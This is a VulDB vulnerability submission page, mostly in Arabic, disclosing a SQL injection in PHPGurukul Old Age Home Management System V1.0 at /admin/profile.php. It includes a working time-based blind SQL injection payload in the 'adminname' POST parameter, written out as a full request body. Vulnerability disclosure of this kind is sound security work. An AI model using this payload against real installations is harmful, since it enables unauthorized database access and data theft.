إرسال #546223: phpgurukul.com Old Age Home Management System V1.0 SQL injectionالمعلومات

عنوان	phpgurukul.com Old Age Home Management System V1.0 SQL injection
الوصف	# [Security] SQL injection in /admin/profile.php ## NAME OF AFFECTED PRODUCT(S) - Old Age Home Management System ## Vendor Homepage - https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/ ## AFFECTED VERSION(S) - V1.0 ## Software Link - https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip ## PROBLEM TYPE - SQL injection ## Root Cause - A SQL injection vulnerability exists in `/admin/profile.php` due to improper input sanitization of the `adminname` parameter. ## Impact - Unauthorized database access, data leakage, data manipulation, etc. ## Vulnerability Details and POC - Parameter: `adminname` (POST) - Payload: ```bash adminname=1' AND (SELECT 4479 FROM (SELECT(SLEEP(5)))SYMc) AND 'gnpI'='gnpI&username=admin&contactnumber=1&[email protected]&submit=
المصدر	⚠️ https://github.com/Gxxianzhong123/CVE1/issues/1
المستخدم	wuguanfengyue (UID 52312)
ارسال	30/03/2025 07:21 PM (1 سنة منذ)
الاعتدال	03/04/2025 08:47 PM (4 days later)
الحالة	تمت الموافقة
إدخال VulDB	303261 [PHPGurukul Old Age Home Management System 1.0 /admin/profile.php adminname/contactnumber حقن SQL]
النقاط	20

Want to stay up to date on a daily basis?

Enable the mail alert feature now!